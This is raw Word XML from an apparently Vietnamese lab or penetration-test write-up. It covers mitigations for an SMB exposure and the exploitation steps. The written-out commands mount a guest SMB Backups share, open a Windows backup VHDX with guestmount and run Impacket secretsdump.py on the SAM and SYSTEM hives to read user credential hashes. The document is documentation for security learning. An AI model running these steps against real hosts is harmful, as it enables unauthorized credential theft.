      <w:r w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC49782" w14:textId="0348FDA8" w:rsidR="71A3207F" w:rsidRDefault="71A3207F" w:rsidP="388B648E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="388B648E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Update window: cập nhật các bản vá mới nhất của window để tránh gặp phải các lỗ hổng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F88AAC" w14:textId="7F798649" w:rsidR="71A3207F" w:rsidRDefault="71A3207F" w:rsidP="617EA195">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="617EA195">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Chặn các port 135, 445 nếu không </w:t>
      </w:r>
      <w:r w:rsidRPr="5370E5C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cần thiết sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17528305" w14:textId="1D603BA7" w:rsidR="6058D749" w:rsidRDefault="6058D749" w:rsidP="3FD0AE1C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3FD0AE1C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Chạy tất cả các phần mềm như một người dùng không có đặc quyền (một phần mềm không có đặc quyền quản trị) để giảm tác động của một cuộc tấn công thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FB55C8" w14:textId="3B78D242" w:rsidR="6058D749" w:rsidRDefault="6058D749" w:rsidP="3FD0AE1C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3FD0AE1C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Nhắc nhở người dùng không truy cập trang web hoặc theo dõi các liên kết được cung cấp bởi các nguồn không xác định hoặc không đáng tin cậy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BFD7AE" w14:textId="5C6D0698" w:rsidR="6058D749" w:rsidRDefault="6058D749" w:rsidP="3FD0AE1C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3FD0AE1C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Thông báo và giáo dục người dùng về các mối đe dọa do các liên kết siêu văn bản có trong email hoặc tệp đính kèm đặc biệt là từ các nguồn không đáng tin cậy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCCD12D" w14:textId="7C2DEA36" w:rsidR="6058D749" w:rsidRDefault="6058D749" w:rsidP="3FD0AE1C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="3FD0AE1C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Áp dụng nguyên tắc ít đặc quyền nhất cho tất cả các hệ thống và dịch vụ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D672178" w14:textId="4400FEB2" w:rsidR="3FD0AE1C" w:rsidRDefault="3FD0AE1C" w:rsidP="3FD0AE1C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2389CC14" w14:textId="0F11AFCB" w:rsidR="00B37A80" w:rsidRPr="00F92FFF" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng</w:t>
      </w:r>
      <w:r w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="3E2F80E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Cao</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBD15C3" w14:textId="1D1F7713" w:rsidR="00317B36" w:rsidRPr="00317B36" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Cách thức khai thác</w:t>
      </w:r>
      <w:r w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>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45"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B37A80" w14:paraId="0CC0901E" w14:textId="77777777" w:rsidTr="1DE776A7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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57BB31" w14:textId="77777777" w:rsidR="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="003A380C">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t>[Lệnh tấn công/mã khai thác]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26B51A59" w14:textId="77777777" w:rsidR="00B37A80" w:rsidRPr="00691796" w:rsidRDefault="00B37A80" w:rsidP="003A380C">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t xml:space="preserve">[màu </w:t>
            </w:r>
            <w:r w:rsidRPr="00D11294">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>đỏ</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
              </w:rPr>
              <w:t xml:space="preserve"> nếu có thay đổi trong mã khai thác]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56BC71D7" w14:textId="3A83E6B7" w:rsidR="1DE776A7" w:rsidRDefault="4FE7EEDB" w:rsidP="1DE776A7">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tìm kiếm thông tin bằng </w:t>
      </w:r>
      <w:r w:rsidRPr="0308E5D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SMB Enumeration </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">bằng user </w:t>
      </w:r>
      <w:r w:rsidRPr="4467AC53">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>invaliduser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211C9920" w14:textId="612B1825" w:rsidR="00317B36" w:rsidRDefault="00317B36" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0D60">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
          <w:rFonts w:eastAsia="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D4A3422" wp14:editId="29FB5376">
            <wp:extent cx="5943600" cy="2369820"/>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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2369820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D3A3A4" w14:textId="77014A9B" w:rsidR="000E25F7" w:rsidRPr="000E25F7" w:rsidRDefault="000E25F7" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E25F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Thực hiện</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> download </w:t>
      </w:r>
      <w:r w:rsidR="000C0FE6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>folder Backup bằng lệnh mount</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3646D1FF" w14:textId="0D8DD356" w:rsidR="00F44808" w:rsidRDefault="0033540F" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0012106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mount -t cifs -o username=guest</w:t>
      </w:r>
      <w:r w:rsidRPr="0012106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0012106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="0012106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>192.168.19.116</w:t>
      </w:r>
      <w:r w:rsidRPr="0012106A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/Backups /mnt/bastion/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4858F290" w14:textId="652578A9" w:rsidR="0012106A" w:rsidRPr="000E25F7" w:rsidRDefault="0012106A" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E25F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Nếu báo lỗi chưa tồn tại </w:t>
      </w:r>
      <w:r w:rsidR="000C0FE6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>folder</w:t>
      </w:r>
      <w:r w:rsidRPr="000E25F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> thì </w:t>
      </w:r>
      <w:r w:rsidR="000E25F7" w:rsidRPr="000E25F7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>nên tạo sẵn file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2DF297" w14:textId="722ADF26" w:rsidR="00120AD9" w:rsidRDefault="00120AD9" w:rsidP="003934B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71BF9F5A" wp14:editId="51A7C5FC">
            <wp:extent cx="5943600" cy="38131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5D89CAB" w14:textId="1F79BD86" w:rsidR="008114E0" w:rsidRDefault="008114E0" w:rsidP="003934B8">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Có thấy trong folder “Backup … 102804” có tồn tại 2 file vhdx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1983E1B8" w14:textId="77777777" w:rsidR="008114E0" w:rsidRDefault="008114E0" w:rsidP="003934B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E01626C" w14:textId="12D95695" w:rsidR="008114E0" w:rsidRDefault="004647B9" w:rsidP="003934B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004647B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>guestmount --add "/mnt/bastion/WindowsImageBackup/Sammy-PC/Backup 2020-11-30 102804/88e506b5-0000-0000-0000-602200000000.vhdx" --inspector --ro /mnt/vhd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14802331" w14:textId="77777777" w:rsidR="004647B9" w:rsidRDefault="004647B9" w:rsidP="003934B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37B7F22F" w14:textId="47C7ACE1" w:rsidR="008114E0" w:rsidRDefault="004B5923" w:rsidP="003934B8">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Thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="004647B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">guestmount </w:t>
      </w:r>
      <w:r w:rsidR="008D3289">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>file vhdx để lấy data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08146FAE" w14:textId="2C819562" w:rsidR="00C26F69" w:rsidRDefault="00C26F69" w:rsidP="003934B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="024CAD97" wp14:editId="6E6C3204">
            <wp:extent cx="5943600" cy="1356360"/>
            <wp:effectExtent l="0" t="0" r="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4EFC912C" w14:textId="196E139C" w:rsidR="00C224DB" w:rsidRDefault="00C224DB" w:rsidP="003934B8">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Có thể thấy đây là ổ C của máy Windows được backup lại với các thư mục như Users, Program Files, ….</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7505EF86" w14:textId="68C0A969" w:rsidR="007F3894" w:rsidRDefault="007F3894" w:rsidP="003934B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="423011C3" wp14:editId="7BFF79CE">
            <wp:extent cx="5943600" cy="26555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39ED3A3D" w14:textId="185AF6BF" w:rsidR="00C224DB" w:rsidRDefault="00F12BCE" w:rsidP="003934B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="34BCAC5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Tại Windows/System32/config có ch</w:t>
      </w:r>
      <w:r w:rsidR="6469F620" w:rsidRPr="34BCAC5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>ứ</w:t>
      </w:r>
      <w:r w:rsidRPr="34BCAC5E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>a 2 file SAM và SYSTEM, dump 2 file này chúng ta có thể thấy được thông tin xác thực của user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FE6B90" w14:textId="47F5B634" w:rsidR="00F12BCE" w:rsidRDefault="00E55F2E" w:rsidP="003934B8">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Có 1 số tool dump sẵn trong máy nhưng nó khá cùi bắp, nên sử dụng Impacket để dump (github)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686107D1" w14:textId="77777777" w:rsidR="006E2B15" w:rsidRDefault="006E2B15" w:rsidP="003934B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A69B26C" w14:textId="61403847" w:rsidR="006E2B15" w:rsidRDefault="006E2B15" w:rsidP="003934B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E2B15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>python3 secretsdump.py -sam SAM -system SYSTEM LOCAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0C137B" w14:textId="7D284AE7" w:rsidR="00AC3D86" w:rsidRDefault="00AC3D86" w:rsidP="003934B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4383B4B3" w14:textId="76A89B3F" w:rsidR="007E27A9" w:rsidRDefault="007E27A9" w:rsidP="003934B8">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Nên copy 2 file SAM và SYSTEM từ folder config sau khi mount vào folder impacket/example để dễ thực hiện và lưu trữ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3105ABBB" w14:textId="41016C0B" w:rsidR="00E55F2E" w:rsidRDefault="006E2B15" w:rsidP="003934B8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E9ABF48" wp14:editId="530A801B">
            <wp:extent cx="5943600" cy="29387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115DC92E" w14:textId="4D7AE96A" w:rsidR="007E27A9" w:rsidRDefault="007E27A9" w:rsidP="003934B8">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Sau đó ta thấy có xuất hiện user sammy, với info</w:t>
      </w:r>
    </w:p>
